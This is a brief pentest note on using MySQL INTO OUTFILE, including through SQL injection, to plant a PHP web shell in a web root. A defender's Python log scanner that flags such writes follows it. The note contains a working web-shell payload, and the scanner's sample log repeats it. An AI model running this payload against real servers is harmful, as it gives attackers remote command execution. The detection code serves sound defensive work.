author: Nathan Acks
You can “upload” reverse shells via MySQL using:
SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/cmd.php';
The path may require some brute-forcing or additional reconnaissance; sometimes you can force an error to return a (potentially) writeable path. Depending on how the application you’re attacking is configured, it may be possible to exploit this via SQLi.
This can be used to bootstrap reverse shells.
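From the defender's side, the statement above is easy to spot in a MySQL query log. The following sketch is an added example, not part of the original notes: it flags `INTO OUTFILE` / `INTO DUMPFILE` writes that target a web-served directory, use a script extension, or carry a server-side script marker. The log line layout, `WEB_ROOTS`, `SCRIPT_EXTS` and the function names are assumptions made for illustration.

```python
import posixpath
import re

# Assumed web-served directories and script extensions; adjust per host.
WEB_ROOTS = ("/var/www", "/srv/www", "/usr/share/nginx")
SCRIPT_EXTS = {".php", ".phtml", ".phar", ".jsp", ".aspx"}

# INTO OUTFILE / INTO DUMPFILE followed by a quoted target path.
OUTFILE_RE = re.compile(
    r"\bINTO\s+(OUTFILE|DUMPFILE)\s+(['\"])(?P<path>.+?)\2", re.IGNORECASE
)
# Server-side script markers inside the selected literal.
CODE_RE = re.compile(r"<\?(php|=)|<%", re.IGNORECASE)

# Constructed sample lines in the style of a general query log (not real data).
SAMPLE_LOG = [
    "2024-05-01T10:00:01Z\t 41 Query\tSELECT id, name FROM products WHERE id = 7",
    "2024-05-01T10:00:02Z\t 41 Query\tSELECT * FROM orders INTO OUTFILE '/var/lib/mysql-files/orders.csv'",
    "2024-05-01T10:00:03Z\t 42 Query\tSELECT '<?php system($_GET[\"cmd\"]); ?>' INTO OUTFILE '/var/www/html/cmd.php'",
]

def classify(statement):
    """Return None if the statement writes no file, else (path, reasons)."""
    m = OUTFILE_RE.search(statement)
    if not m:
        return None
    path = posixpath.normpath(m.group("path"))  # collapses ../ tricks
    reasons = ["file-write"]
    if any(path.startswith(root + "/") for root in WEB_ROOTS):
        reasons.append("web-root")
    if posixpath.splitext(path)[1].lower() in SCRIPT_EXTS:
        reasons.append("script-extension")
    if CODE_RE.search(statement[:m.start()]):
        reasons.append("script-marker")
    return path, reasons

def scan(lines):
    """Return (line_number, path, reasons) for every file-writing statement."""
    hits = []
    for n, line in enumerate(lines, 1):
        result = classify(line)
        if result:
            hits.append((n, *result))
    return hits

if __name__ == "__main__":
    for n, path, reasons in scan(SAMPLE_LOG):
        level = "HIGH" if len(reasons) > 1 else "info"
        print(f"line {n}: {level} {path} ({', '.join(reasons)})")
```

Whether such a write can succeed at all depends on the account holding the `FILE` privilege and on the server's `secure_file_priv` setting, so both are worth auditing alongside the logs.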